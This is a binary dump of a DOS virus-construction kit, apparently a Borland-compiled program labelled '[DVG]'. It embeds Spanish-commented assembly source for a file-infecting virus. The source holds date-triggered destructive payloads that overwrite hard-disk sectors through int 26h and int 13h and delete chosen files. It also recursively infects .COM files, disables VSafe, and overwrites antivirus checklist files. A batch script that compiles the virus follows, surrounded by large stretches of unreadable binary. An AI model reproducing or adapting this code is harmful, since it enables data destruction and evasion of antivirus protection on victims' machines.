MZ`SV##$ $ $*$/$9$>$M$W$\$f$k${$$$$$$$$$$$%%%*%4%G%]%g%w%|%%%%%%%%%%%%%&&&&!&3&8&=&O&T&Y&k&p&u&&&&&&&&&&&&&&&''''/'4'9'K'P'U'g'l'q''''''''''''''''(((+(0(5(G(L(Q(c(h(m(((((((((((((((( )))'),)1)C)H)M)_)d)i){)))))))))))))))* **#*(*-*?*D*I*[*`*e*w*|************* ++7+F+N+`+e+j+|+++++++++++++++, ,,,,),.,9,A,S,X,],e,,,,,,,,,,-----2--------...!.,.?.D.I.X.`.k.}.........../@/E/\/g/y/~//////////00,0;0J0Y0h0w00000011111111122,2;2J2Y2h2w2222222222234 44 4%4*4<4A4F4X4]4b4t4y4~44444444444444 5555$565A5S5X5]5e555555555566$636=6K6P667&7+7;7@7E7W7\7a7s7x7}77777777777777888)8;8@8E8M8g8v8888888888 99*999C9Q9V9:+:3:>:P:U:Z:b:|:::::::::;;!;+;9;>;;;< << <%<7<<<A<S<X<]<o<t<y<<<<<<<<<<<<<<= ====.=6=P=_=n=}========>>^>h>m>}>>>>>>>>>>>>>>> ??? ?0?5?:?L?Q?V?`?e?y?~?????????????@@ @@!@&@8@=@B@T@Y@^@p@u@z@@@@@@@@@@@@@@@ AA$A)A.A@AEAJA\AaAfAxA}AAAAAAAAAAAAAAABBB,B1B6BHBMBRBdBiBnBBBBBBBBBBBBBBBB CCC(C-C2CDCICNC`CeCjC|CCCCCCCCCCCCCCCDDDD0D5D:DLDQDVDhDmDrD|DDDDDDDDDDDDDDDEE%E*E/EAEFEKE]EbEgEyE~EEEEEEEEEEEEEEEFFF-F2F7FIFNFSFeFjFoFFFFFFFFFFFFFFFF GGG)G.G3GEGJGOGaGfGkG}GGGGGGGGGGGGGGGHHHH.H3H8HBHGH[H`HrHwH|HHHHHHHHHHHHHHIIII$I6I;I@IRIWI\InIsIxIIIIIIIIIIIIIIIJJJ J2J7JQPQUQZQlQqQvQQQQQQQQQQQQQQQRRRR0R5R:RLRQRVRhRmRrRRRRRRRRRRRRRRRRSSS,S1S6SHSMSRSdSiSnSSSSSSSSSSSSSSSS TTT(T-T2TDTITNT`TeTjT|TTTTTTTTTTTTTTTU UU$U)U.U@UEUJU\UaUfUxU}UUUUUUUUUUUUUUV VV V%V*VXPXUXZXlXqXvXXXXXXXXXXXXXXXYYYY0Y5Y:YLYQYVYhYmYrYYYYYYYYYYYYYYYYZZZ,Z1Z6ZHZMZRZdZiZnZZZZZZZZZZZZZZZZ [[[([-[2[D[I[N[`[e[j[|[[[[[[[[[[[[[[[\ \\$\)\.\@\E\J\\\a\f\x\}\\\\\\\\\\\\\\] ]] ]%]*]<]A]F]X]]]b]t]y]~]]]]]]]]]]]]]^^ ^^!^&^8^=^B^T^Y^^^p^u^z^^^^^^^^^^^^^^____"_4_9_>_P_U_Z_l_q_v_______________````0`5`:`L`Q`V`h`m`r````````````````aaa,a1a6aHaMaRadaianaaaaaaaaaaaaaaaa bbb(b-b2bDbIbNb`bebjb|bbbbbbbbbbbbbbbc cc$c)c.c@cEcJc\cacfcxc}ccccccccccccccd dd d%d*d Borrar algun archivo al correr el file infectado? SiNoIngrese archivos a borrarEj: *.DBF o NC.EXE[ ] call dbfSACCIONESFuck HDDDisplay StringDisplay & Fuck HDDStop PcRebootBeeps Fuck T.P. Print ScreenKill Rnd SectorNinguna"Ingrese String (max 30 Caracteres) [ ]--ACTIVACION--DiaMesHoraDia de la semana12345678910111213141516171819202122232425262728293031;----------Dia?------------- Mov ah,02Ah int 021h mov al,dl cbw cmp ax ,jne no_playload;----------Mes?-------------cmp dh ,0;----------hOrA?------------- Mov ah,02ch mov al,ch DomingoLunesMartes MiercolesJuevesViernesSabado ;----------WEEKDAY?-------------;****T R a s H !****HDD******* mov ah,0dhint 21hmov al,2 mov cx,0ffffhmov dx,0int 26h mov ah,0dh mov dx,0ffffh1;display string *********************************mov dx,offset disp mov ah,09hint 21h int 20h1;************************************************mov dx, offset disp (;Stop_Pc********************************Uugh: jmp Uugh(;End-Stop_Pc****************************-;Reboot************************************* db 0eah,000h,000h,0ffh,0ffh -;******************************************* +;BeepS************************************  mov cx,000Eh  jcxz beep_F  mov ax,0E07h beep_S: int 010h  loop beep_S beep_F: +;***************************************** 1 Trash_tp:;************************************** push ax  push bx  push cx  push dx  mov ax, 301h xor bx, bx  mov cx, 1  mov dx, 80h int 13h pop dx pop cx pop bx pop ax 1;endTrash_tp************************************ .Printscr:;Print*Screen************************int 5h,;End*Print-Screen*************************** KILLRNDSEC: push cx push dx xor ax, ax int 1ah xchg dx, ax pop dx pop cx push cx push dx push ax mov ax, 0dh int 21h mov ah, 19h mov cx, 1 int 26h 7;---------------------------Cagar Vsafe----------------Vzafe proc near push 0fa02h pop ax push 5945h pop dx int 21hretVzafe endp7;------------------------------------------------------ No_Playload: cld  mov cx, 4d mov di, 0100h lea si, bp + Bytes_Orig rep movsbQ;-------------------------------- BUSQUEDA ------------------------------------ Q;-----------------------Guardar directorio original --------------------------- mov ah,47h mov dl, 0 lea si, bp+directorio_original+1int 21h 3;Buscar la primer entrada ------------------------- Buscar_file:mov ah, 4ehlea dx, bp+directoriomov cx, 00010000b int 21hD;Verificar si es un directorio ------------------------------------- VERIFICAR: push 0095h pop bx mov al, [bx]shr ax, 4 shl ax, 7 cmp ax, 10000000bjne dir O;------------------------- Verificar si ("." o "..") --------------------------lea si, bp+actualmov di, 009eh cmpsb je dir mov cx, 0002h lea si, bp+retrocesomov di, 009eh repe cmpsb je dirP;--------------------------- Cambiar de directorio ---------------------------- CAMBIO:mov ah, 3bh mov dx, 009ehO;--------------------------- Salvar el DTA actual -----------------------------mov cx, 43dlea di, bp+dtamov si, 0080h rep movsb G;--------------------------- Buscar el primer file --------------------lea dx, bp+file_buscmov cx, 0 int 21h jc retro2 jmp hay_filesO;----------------------------- proximo file ----------------------------------- SEARCH: mov ah, 4fhint 21h jc retro2 O;---------------------- Retroceder de directorio ------------------------------RETRO:mov ah, 3bh lea dx, bp+retroceso jnc buscar_filejmp retornar S;----------------------- Retroceder de directorio ---------------------------------RETRO2:mov ah, 3bhlea dx, bp+retroceso jnc act_dta jmp retornarO;---------------------- Buscar el proximo directorio --------------------------DIR: mov ah,4fhjnc verificar jmp retro ;Actualizo DTA ----------ACT_DTA:lea si, bp+dtamov di, 0080h jmp dir P;------------------------FIN DE BUSQUEDA--------------------------------------- Retornar: mov cx, 43d lea si, bp + DTA_orig mov di, 0080h  rep movsb ) mov ah, 3bh ;vuelve a dir original #lea dx, bp+directorio_original #int 21h ,and bl,11111111b ;activo flags del vsafe call Vzafe push 0100hpop ax jmp ax :;--------------------------------------------------------- Hay_files:mov ax, 03d02hmov dx, 0009ehint 021h push ax pop bx push bx mov ax, 03f00hmov cx, 0007h lea dx, Bytes_Orig + bp int 021hmov cx, 4dlea si, bp+stringlea di, bp+Bytes_Origadd di, 3d repe cmpsbjne Infectar>;------------------------------------------------------------- Proximo_File: pop bx mov ah, 03ehint 021h mov ah, 04fh int 021h jb Retro2 jmp Hay_files <;----------------------------------------------------------- Infectar: pop bx push bx mov ax, 5700hint 21hmov word ptr [bp+fecha],cx mov word ptr [bp+fecha+2],dxmov ax, 04200h mov cx, 0 mov dx, 0 int 021h push bx mov ah, 040hmov cx, 1 lea dx, Jump + bpint 021h mov cx, 2 mov si, 009ahlea di, bp + Longitud rep movsbadd Longitud + bp,1 pop bx push bx mov cx, 2lea dx, Longitud + bp push bx lea dx, bp + stringmov ax, 04202hlea si, bp + DTA_origmov cx,43dlea bx, DTA_orig + bpDTA_clr:mov byte ptr [bx],0 inc bxloop DTA_clrmov cx, 1000dlea dx, bp + Comienzo mov ax, 5701hmov cx, word ptr [bp+fecha]mov dx, word ptr [bp+fecha+2]O;---------------------------Sobreescribir los CHECKLISTS----------------------- push 4301h pop ax push 0000h pop cxmov ax,3d02hlea dx, bp+checklistint 21h ; sobrescribe mov ax,4000hmov ax,3e00h int 21hO;---------------------------Sobreescribir el ANTI-VIR.DAT---------------------- push 4301hpop ax pop cx mov ax,3d02h lea dx, bp+tbavint 21h mov ax,4000h 4;---------------------------------------------------"lea dx, bp+directorio_original call VzafeJ;----------------------------Ejecutar Host--------------------------------push 0100h pop ax jmp ax 9;------------------------------Borrar-Files--------------dbfs proc nearlea dx,bp+dbff ; DX -> datamov ah,04Eh ;1er filemov cx,00100111bint 021h mov ah,02Fhlea dx,[bx + 01Eh] mov ah,041hret dbfs endp D;--------------------------DATOS----------------------------------- DTA_orig db 43d dup (0) Jump db 0e9h Longitud db 2 dup (0) Bytes_Orig db 7d dup(0) string db "!#%&" ,0 File_busc db "*.C?M", 0 dta db 43d dup(0) dta_org db 43d dup(0) directorio db "*.*",0 actual db ".",0 retroceso db "..",0 %directorio_original db "\",64 dup(0) fecha db 4 dup(0) atributos db 2 dup(0) nam db "[DVG]" !checklist db "chklist.ms",0 #tbav db "anti-vir.dat",0dbff db "",0disp db".$",09;-------------------------------------------------------- start endp codigo ends end start# GeNerANDo vIrUs!!! rem Compilador DVG @echo offtasm vir tlink /t vir del vir.map del vir.obj del vir.asmcompil.BAT/c ren font1.exe font1.dvg/c ren font2.dvg font2.exefont2/c ren font2.exe font2.dvg/c del compil.bat/c ren end.dvg end.exeend/c ren end.exe end.dvgJU WW W Wc WW W WcWW3W3WW34W3IWpWOP WUW3W]W pW 3JWW3aW3WW3vW3WW3W3W WOP WW W W WW33pWOP WUW3W]W pW 3J W WW1P  WW1P  WW1P  WTW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W%W1P  W:W1P  WHW1P  WjW1P  WjW1P  WwW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W W1P  W W1P  W5W1P  WfW1P  W{W1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W$W1P  W=W1P  WQW1P  WaW1P  WrW1P  WW1P  WcPWJWW1P PWJ"PPPPWWW WW Ws PPJJ =uS =uN1PW>StJ PWJWW1P WW1P P PJPWJW W1P PWJP PJWW P  W WW1P  WcJJPPJPWJW&W1P PWJPPPPW/WW 8WW GWW ZWW bWW iWW oWW yWW WW WW Ws PPJJ =uAj=uB^=uCR=uEF=uF:=uG.=uH"=uI= uJ = uD1PW>Bt >CtJPWJWW1P P PJWW1P PWJP PJWWP >DuLJPWJPPJWW1P PWJPPPPWWW WW WW WW Ws PPJJ =uA"=uB=uC =uD1PWJ= u 1= u $=u=u =u1PW>tBPWJ"PPJWW1P PWJ"PPPPW5WW 8WW ;WW >WW AWW DWW GWW JWW MWW PWW SWW VWW YWW \WW _WW bWW Ws PPJJ =u =u =u =u =u =u =us=uf= uY= uL= u?= u2= u%=u=u =u1PW>WWP  W W P1PY  WeW1P  WW1P  WW1P  WW1P  WW1P  WW1P W1P  W P1PY  WW1P  Wc> WWP  W W P1PY  WW1P  WW1P  WW1P  WW1P W1P  W P1PY  WW1P  Wc[= u 1= u $= u = u =u1PW>tJPWJ"PPJWW1P PWJ"PPPPW*WW -WW 0WW 5WW 8WW ;WW >WW AWW DWW GWW JWW Ws PPJJ =u  =us=uf=uY=uL=u?=u2=u%= u= u = u1PW>WWP  W W P1PY  WW1P  WW1P  WW1P  W W1P  WW1P  WW1P W1P  W P1PY  WW1P  WcCWWP  W W P1PY  WaW1P  WW1P  WW1P  WW1P  WW1P W1P  W P1PY  WW1P  Wc>At W WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  Wc>Bt W WW1P  W(W1P  W<W1P  WGW1P  WPW1P  WXW1P  Wc>Ct W WW1P  WW1P  W<W1P  WGW1P  WPW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  Wc>Et W WW1P  WW1P  WW1P  WW1P  Wc>Fur W W W1P  W/ W1P  WL W1P  Wc>Gt W Wz W1P  W W1P  W W1P  W W1P  W W1P  W W1P  W/ W1P  WN W1P  Wc>Ht W Wz W1P  W W1P  W W1P  W W1P  W W1P  W W1P  W W1P  W W1P  W( W1P  W9 W1P  WF W1P  WS W1P  W` W1P  Wm W1P  Wz W1P  Wc>Iur W W W1P  W W1P  W W1P  Wc>JtN W W W1P  W W1P  W% W1P  W. W1P  W: W1P  WC W1P  WO W1P  W[ W1P  Wg W1P  Ws W1P  W W1P  W W1P  W W1P  W W1P  W W1P  WO W1P  W W1P  W W1P  WO W1P  W[ W1P  Wc W W W1P  W W1P  W W1P  W+ W1P  W5 W1P  WB W1P  WL W1P  WW W1P  W[ W1P  Ws W1P  W W1P  W W1P  W W1P  W W1P  W W1P  W W1P  W W1P  W_W1P  WW1P  WW1P  WW1P  WW1P  WW1P  W<W1P  WIW1P  WYW1P  WsW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W%W1P  W6W1P  WLW1P  WbW1P  WW1P  WW1P  WW1P  WW1P  W W1P  W W1P  W9W1P  WRW1P  WbW1P  WnW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W:W1P  WJW1P  W]W1P  WpW1P  WW1P  WIW1P  WW1P  WW1P  WW1P  W W1P  WW1P  W'W1P  WwW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W3W1P  WCW1P  WSW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WAW1P  WGW1P  WW1P  WRW1P  WdW1P  WrW1P  WW1P  W:W1P  WW1P  WW1P  WpW1P  WW1P  WW1P  WW1P  W%W1P  W6W1P  WQW1P  WlW1P  WW1P  WW1P  WW1P  WW1P  W&W1P  W3W1P  WAW1P  WRW1P  WcW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W.W1P  WDW1P  WaW1P  WnW1P  W}W1P  WW1P  WW1P  WW1P  WW1P  WW1P  W(W1P  W6W1P  WCW1P  WTW1P  WeW1P  WyW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W W1P  WW1P  W#W1P  W+W1P  WGW1P  WdW1P  WxW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W%W1P  W?W1P  WMW1P  WeW1P  WpW1P  WW1P  W{W1P  WW1P  WaW1P  W6W1P  WW1P  WW1P  WnW1P  WW1P  WaW1P  WeW1P  WpW1P  WW1P  WxW1P  WW1P  WW1P  W:W1P  WW1P  WW1P  WpW1P  WW1P  WW1P  WW1P  W'W1P  W?W1P  WJW1P  WW1P  W W1P  WW1P  WZW1P  WlW1P  WaW1P  WW1P  WW1P  WW1P  WW1P  W6W1P  WCW1P  WaW1P  WW1P  WW1P  W*W1P  W6W1P  WBW1P  WMW1P  W\W1P  WqW1P  WzW1P  WW1P  W#W1P  WW1P  WW1P  WW1P  WW1P  WW1P  W6W1P  WW1P  W,W1P  W<W1P  WLW1P  W\W1P  W#W1P  WW1P  WW1P  WlW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  WW1P  W*W1P  W9W1P P7 Bt>Cu6 Wh"W1P W1P w"W1P  W}"W1P  W"W1P  W"W1P  W"W1P  WcJPWJW"W1P  W W"W1P  W#W1P  W#W1P  W"#W1P  W/#W1P  W;#W1P  WG#W1P  WcS#W WOP WW W Z#W WW33pWOP WUW3W]W pW 3JWW3_#W3WW3z#W3#W WOP WW W W WW33pWOP WUW3W]W pW 3WW3#W3WW3#W3WW3#W3#W WOP WW W W WW33pWOP WUW3W]W pW 3WW3#W3]1U1thF~&F~&EF ~&E~&} ~ ~&E ~&~&E=P~P~&+~&E~1&E&E ~1&EF] U1~&E& E te~&}&=1&E&E~&E&U ~&E &U~&}&E&U~&E&U ~&u&u 1PT~&E& E u9]U&&~ W~W P ~&EF0@{WF0~&E+P P# ~&EF~&E& E uz11RP11RP~&5~&E~&EHP~&u~WP1PP ~&E&U ~&E&U ~&}&E&U~&E&U ~&}&&Uy~&}&u&5~&u &u~&5~&E~&EHP~&u~WP1PPFډV܋FڋV~&}&=&E&UFڋV~&}&&U]U~&HP~&EHPJWP1PY  ~&EF:Fw*FFWP1PY  F:FuۿWP1PY  ~&E~&EHF~&E:FwlFF~&HPFPJWP1PY  ~&~&EPFPJWP1PY  F:Fu~&HP~&E~&EPJWP1PY  ~&EF:Fw*FFWP1PY  F:FuۿWP1PY  ~&E&U ~&E &UP~&} W~&} &E&U~&E &U~&E &U~&;U u&;Eu]U  ?J0FKJ0F~WFP~&} W JF~u Jt JFF0FF0FP~&} W`F=Kt=Hu~&} &&U~&E &U=Mt=Pu~&} &E&U~&E &Uf=Gu~&E&U ~&E &UI=Ou~&}&&U~&E &U)=u F1F= uF~&} WF~uFPFPJF]U""~ W~W P /tVFV~&&UFV~&E&UF~&EF~&E F~&E ~W~W P F‰]U1~ tp~&EP~&E PJW~W1P  ]U~&E FF]U&,Fv ~ tXπ>ut^C #6G#n6W 6w6O6o:w':w#xx:w:.w @>7$>ʊ˸PX>:u2ˋ6W6wr:w6r :6w**ˋ6Gt$ &p6G$&&ˀˠˋ6W t@3&Ju&:uË6_4;sau aCBBa$aˀ>utˠ u2 u & uˋ6EEE ]EZME06pˁ}t E׸?؉EM]MMM3U~&UJJ&u&} 3\<t4<t0<tDI<t'<t#<t7<tF< tO< r;t&C;v t }K;t&< rjC둀> t&C N& CC~3&E&] ]6&M&)M&} > u &G33  SQRPrX<t*<t-< t3< t5 2ReZ:v Q:t -ZY[:6vQR>ZYô2 2@؋Pڋ&<t!<t,< t5< t9G:vIu tutë笫_ZYVWU]_^qڌ3£&.5!E%!#%!$%!?%!PPP uPPPf3Xǖ9sWT!NX[YZ^_]ϸY[33ۺq t t&;t&+ t3#PS˸PP.%! t)*2@:U5L!. t8Cñd 20PXPXPX$0<:rд!!#$456789:;<=>?uRuntime error at . Portions Copyright (c) 1983,90 BorlandUF]rUFNq]rt66&=>>7DrT4;uû;Tw r;DsDT4;uá+%>6‹ʀ tvjَό&=;6t[&;Uwr&;EwWSQ& &]t3SQ&M&]+ڃ$&&E&M&]ό_& &]XZ$;rw%;wWã&&U3PXZ6j<rtj@3 tZuS;wrK;rE;rw=;s7&E&U؎nj&=;wr;wt RP Y[Ënj‹&M&];u:;u6;u;u >W&&U$_&&U%3˃>uˡ+6D&;U|&;r&;U|&;Ew˸+s ;r˸v r^ t F &1ˋUVW_^]r tFV‹ۋ]~ t^&1ˌU]r 3FFˋ]|U~^& v &] Mu˸I66w3׫3Etȫ3!r3>u&}u &]&U &} h;t&Ë6}=;uÃ>u&}u &]&U&} i&C;tË6}QVq&]WW&] t_&E &]&U&} ^YU~WQup<t C< ud< uC_&]5]U~Wcu {_&]]U~]&}uÃ>u W&] tU~WurC_&]]˰U~ WuNI~ F_&]]U~ Wvu< t<t CAF;Nu+ _&]]U~ Wu%vN2+~ D2_&]]܌66w2܌6w 66O:v2 6&2܌6 6w26O +r@6O }3;v3܌66w& 2&s&G6w6& 2)G<r)wuO2+rBt+GJu3+6+G܌6w6&%G:v t2u:Ď66G܌6 6w6GUW~ WPFHP~WW~ WvP~ Wvo] U~~CW~ WPFHPvW~ WFFPP\~ WP]܌6w 66O;sNO 66O6G6G